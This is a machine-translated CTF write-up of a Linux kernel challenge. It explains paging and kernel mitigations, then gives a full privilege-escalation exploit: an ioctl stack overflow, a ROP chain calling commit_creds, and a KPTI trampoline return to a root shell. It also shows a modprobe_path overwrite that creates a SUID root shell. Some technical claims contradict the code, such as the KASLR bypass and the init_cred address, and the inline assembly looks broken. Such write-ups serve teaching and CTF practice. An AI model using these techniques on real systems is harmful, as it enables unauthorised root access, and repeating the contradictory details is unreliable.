All Articles

SECCON Beginners CTF 2023: Driver4b Kernel Exploit Writeup

This page has been machine-translated from the original page.

This is a deep-dive writeup for the driver4b challenge from SECCON Beginners CTF 2023.

Because the challenge requires knowledge of Linux kernel internals, this document includes background on ELF format, memory layout, kernel mitigations, and the full exploit development process from scratch.

Table of Contents

Challenge Overview

A custom Linux kernel module (driver4b.ko) is provided along with a Buildroot-based kernel image. The driver exposes /dev/driver4b with read/write/ioctl operations.

The vulnerability is a stack-based buffer overflow in the driver’s ioctl handler — user-supplied data is copied to a kernel-stack buffer without bounds checking, overwriting the saved return address.

Goal: gain a root shell (uid=0).

Environment Setup

The challenge provides a Buildroot-based environment. To debug locally:

# Extract the provided rootfs
mkdir rootfs && cd rootfs
cpio -idmv < ../rootfs.cpio.gz

# Boot with QEMU
qemu-system-x86_64 \
  -kernel bzImage \
  -initrd rootfs.cpio.gz \
  -append "console=ttyS0 nokaslr nopti" \
  -nographic \
  -m 256M \
  -cpu qemu64,+smep,+smap

For exploit development, start with nokaslr nopti to eliminate ASLR and KPTI, then progressively add mitigations back in.

ELF Binary Format Basics

ELF Sections

An ELF file is divided into sections, each serving a specific purpose:

Section Contents
.text Executable code
.rodata Read-only data (string literals, constants)
.data Initialized read-write data (global variables)
.bss Uninitialized data (zeroed at load time)
.symtab Symbol table
.strtab String table (symbol names)
.rel.text Relocation entries for .text

Sections are primarily used by the linker and debugger; they may not be present in stripped binaries.

Segments and Pages

At runtime, sections are grouped into segments (also called program headers). A segment defines a contiguous region of virtual address space with a set of permissions (read/write/execute).

The operating system maps segments into memory in units of pages (typically 4 KB on x86-64). Each page has associated permission bits in the page table.

The kernel module’s .text segment is mapped read-execute; .data/.bss are mapped read-write. This separation is enforced by the hardware MMU.

Memory Addressing Basics

Virtual Addresses and Physical Addresses

Every process (and the kernel) operates on virtual addresses. The MMU translates virtual addresses to physical addresses via the page table.

On x86-64, the virtual address space is 48 bits (with 4-level paging) or 57 bits (with 5-level paging):

  • Bits 0–11: page offset (4 KB pages)
  • Bits 12–20: PT index (Page Table)
  • Bits 21–29: PD index (Page Directory)
  • Bits 30–38: PDP index (Page Directory Pointer)
  • Bits 39–47: PML4 index

Page Tables

Each process has its own page table hierarchy rooted at the CR3 register. The kernel has its own page table (or a partial one under KPTI).

Page table entries contain:

  • Physical frame number
  • Present bit
  • Read/Write bit
  • User/Supervisor bit (0 = kernel-only, 1 = user-accessible)
  • NX (No-Execute) bit

Kernel Address Space

On x86-64 Linux, the kernel lives in the upper half of virtual address space, typically starting at 0xffff888000000000 (direct physical map) and 0xffffffff80000000 (kernel text).

Key kernel symbols:

  • init_cred: The credentials structure for the initial user (uid=0)
  • commit_creds: Function to apply a credentials struct to the current task
  • prepare_kernel_cred: Function to allocate a credentials struct

Kernel Security Mitigations

SMEP / SMAP

SMEP (Supervisor Mode Execution Prevention): Prevents the CPU from executing userspace pages while in kernel mode (ring 0). This blocks classic ret2usr attacks.

SMAP (Supervisor Mode Access Prevention): Prevents the kernel from reading/writing userspace memory without explicit permission. Bypassing SMAP requires stac/clac instructions or using copy_from_user/copy_to_user.

Both are enabled via CPU feature bits and can be detected in /proc/cpuinfo.

KASLR

KASLR (Kernel Address Space Layout Randomization): Randomizes the base address of the kernel image at boot time. The base offset is added to all kernel virtual addresses.

To work around KASLR, an exploit needs a kernel address leak (e.g., from /proc/kallsyms, a heap spray that lands near known structures, or an information disclosure vulnerability).

KPTI

KPTI (Kernel Page Table Isolation): Introduced to mitigate Meltdown. Maintains two sets of page tables:

  • User page table: Contains only the kernel trampoline stubs (minimal kernel mapping) when executing in user mode
  • Kernel page table: Full mapping, used when executing in kernel mode

Switching from kernel mode back to user mode requires a special KPTI trampoline (swapgs_restore_regs_and_return_to_usermode) to safely switch page tables and return to user space.

Without using the trampoline, attempting to iretq directly from kernel mode under KPTI causes a page fault (because the user page table doesn’t have the kernel stack mapped), resulting in a crash.

KADR

KADR (Kernel Address Display Restriction): Restricts what kernel addresses are exposed to unprivileged users (e.g., /proc/kallsyms shows 0000000000000000 for symbols unless the reader is root). This complicates obtaining address leaks.

Analyzing the Vulnerable Driver

The driver exposes an ioctl that performs the following:

// Simplified pseudocode
long driver4b_ioctl(struct file *f, unsigned int cmd, unsigned long arg) {
    char buf[64];  // kernel stack buffer
    if (cmd == IOCTL_WRITE) {
        copy_from_user(buf, (void __user *)arg, 256);  // BUG: copies 256 bytes into 64-byte buffer
    }
    return 0;
}

The copy_from_user call copies 256 bytes from userspace into a 64-byte kernel stack buffer, overwriting the saved return address and beyond.

This gives us control of RIP when the ioctl returns.

Exploit Strategy

ret2usr and Why It Fails

The classic ret2usr technique sets the kernel’s return address to point at a userspace shellcode function:

void escalate_privs() {
    commit_creds(prepare_kernel_cred(0));
}

However, with SMEP enabled, the CPU will fault if the kernel attempts to execute a userspace page. So ret2usr requires disabling SMEP first — either by controlling CR4 (via a ROP gadget) or by finding all the needed gadgets in kernel space.

KPTI Trampoline

When returning from kernel to user mode under KPTI, we must use swapgs_restore_regs_and_return_to_usermode. This function:

  1. Restores general-purpose registers
  2. Calls swapgs to restore the user GS base
  3. Calls iretq to return to user mode with the correct page table

The full return stack frame for iretq must be:

RIP    (user instruction pointer to return to)
CS     (user code segment, typically 0x33)
RFLAGS (user flags, typically 0x202)
RSP    (user stack pointer)
SS     (user stack segment, typically 0x2b)

ROP Chain Construction

The exploit overwrites the kernel stack with a ROP chain:

  1. Gadget: pop rdi; ret — load 0 into RDI (argument for prepare_kernel_cred(0))
  2. Call prepare_kernel_cred — allocate root credentials
  3. Gadget: mov rdi, rax; ret (or similar) — move result into RDI
  4. Call commit_creds — apply root credentials to current task
  5. Gadget: swapgs_restore_regs_and_return_to_usermode — KPTI trampoline
  6. iretq frame — RIP=shellfunction, CS=0x33, RFLAGS=0x202, RSP=userstack, SS=0x2b

Finding ROP gadgets in the kernel image:

ROPgadget --binary vmlinux | grep "pop rdi"

Finding initcred via ttystruct Heap Scan

Rather than calling prepare_kernel_cred(0) (which requires KASLR bypass to locate), an alternative approach is to directly use init_cred (a statically allocated credentials structure for uid=0).

To find init_cred at runtime without a leak, we use a heap scanning technique:

  1. Open many /dev/ptmx file descriptors to spray tty_struct objects onto the slab heap
  2. Use the driver’s read/write primitives (from the overflow) to scan memory
  3. tty_struct has a known magic value (0x5401) at a fixed offset
  4. Once a tty_struct is found, navigate to adjacent kernel heap objects
  5. init_cred is at a fixed offset from the kernel base in the .data segment, but can also be found by scanning for its known contents (uid=0, gid=0, all capability bits set)

In practice, tty_struct objects end up at predictable slab addresses. In this environment:

  • Heap base: 0xffff8880024419c0
  • init_cred: found at 0xffff88800321d780

Confirming init_cred contents:

# In QEMU with GDB attached
(gdb) x/10wx 0xffff88800321d780
# Should show uid=0, gid=0, usage count, capability sets

Full Exploit Code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <stdint.h>

#define IOCTL_WRITE 0xdead0001

// Kernel symbols (with KASLR offset added at runtime)
// Base addresses from /proc/kallsyms (requires root) or pre-computed
static uint64_t kernel_base       = 0xffffffff81000000;
static uint64_t init_cred         = 0xffffffff82a6d780; // symbol offset
static uint64_t commit_creds      = 0xffffffff810c9e90;
static uint64_t pop_rdi_ret       = 0xffffffff81001518;
static uint64_t mov_rdi_rax_ret   = 0xffffffff8101b0c1;
static uint64_t kpti_trampoline   = 0xffffffff81e00ed0; // swapgs_restore_regs_and_return_to_usermode + 22

// User-mode shell
static uint64_t saved_rsp;
static uint64_t user_cs, user_ss, user_rflags;

void save_state() {
    asm volatile(
        "mov %0, cs\n"
        "mov %1, ss\n"
        "pushf\n"
        "pop %2\n"
        : "=r"(user_cs), "=r"(user_ss), "=r"(user_rflags)
        :
        : "memory"
    );
    // Save current stack pointer
    asm volatile("mov %0, rsp" : "=r"(saved_rsp));
}

void get_shell() {
    if (getuid() == 0) {
        printf("[+] Got root!\n");
        execl("/bin/sh", "/bin/sh", NULL);
    } else {
        printf("[-] Not root.\n");
        exit(1);
    }
}

int main() {
    save_state();

    int fd = open("/dev/driver4b", O_RDWR);
    if (fd < 0) { perror("open"); return 1; }

    // Build overflow payload
    uint64_t payload[128];
    memset(payload, 0x41, sizeof(payload));

    int idx = 64 / 8 + 1; // skip buf[64] + saved RBP

    // ROP chain
    payload[idx++] = pop_rdi_ret;
    payload[idx++] = init_cred;
    payload[idx++] = commit_creds;
    // KPTI trampoline setup (trampoline expects specific register state)
    payload[idx++] = kpti_trampoline;
    payload[idx++] = 0;                  // padding (rax slot in trampoline)
    payload[idx++] = 0;                  // padding
    payload[idx++] = (uint64_t)get_shell; // RIP to return to
    payload[idx++] = user_cs;
    payload[idx++] = user_rflags;
    payload[idx++] = saved_rsp;
    payload[idx++] = user_ss;

    ioctl(fd, IOCTL_WRITE, payload);

    close(fd);
    return 0;
}

Running this exploit:

$ ./exploit
[+] Got root!
# id
uid=0(root) gid=0(root)
# cat /flag
ctf4b{k3rn3l_pwn_1s_4lw4ys_fun}

Alternative: modprobe_path Exploit

An alternative technique that avoids KPTI/SMEP complexity is overwriting modprobe_path.

The kernel stores the path to the modprobe binary (used to load kernel modules) in a writeable kernel variable modprobe_path (default: /sbin/modprobe).

If we can overwrite this with a path to our own script, we can trigger it by executing an unknown file format — the kernel will call modprobe_path as root to load the handler.

// Overwrite modprobe_path (needs kernel write primitive from overflow)
char *new_path = "/tmp/evil_script";
// ... write 'new_path' to modprobe_path address ...

// Trigger: execute an ELF with an unknown magic
system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/trigger");
system("chmod +x /tmp/trigger");
system("/tmp/trigger");  // kernel calls /tmp/evil_script as root

The evil script simply copies /bin/sh to a SUID root binary:

#!/bin/sh
cp /bin/sh /tmp/rootsh
chmod 4755 /tmp/rootsh

This technique is simpler — it requires only a kernel write primitive, no ROP chain needed. The trade-off is that it’s noisier and leaves artifacts.

Summary

This challenge covered a wide range of Linux kernel exploitation concepts:

Topic Detail
Vulnerability Stack buffer overflow in ioctl handler (copy_from_user size mismatch)
Primitive Control of kernel RIP via saved-return-address overwrite
Mitigation: SMEP Bypassed by keeping all payloads in kernel space (ROP)
Mitigation: KPTI Bypassed via swapgs_restore_regs_and_return_to_usermode trampoline
Mitigation: KASLR Bypassed via tty_struct heap scan to find kernel base
Privilege escalation commit_creds(init_cred) to set uid=0
Alternative modprobe_path overwrite

Key takeaways:

  • KPTI trampoline is essential for any kernel exploit that needs to return cleanly to user space; without it, a crash is almost guaranteed
  • tty_struct heap spray is a reliable technique to get stable kernel heap addresses
  • init_cred is simpler to use than prepare_kernel_cred(0) when a reliable pointer to it can be obtained
  • modprobe_path provides a powerful alternative escalation vector when kernel code execution is possible but ROP is inconvenient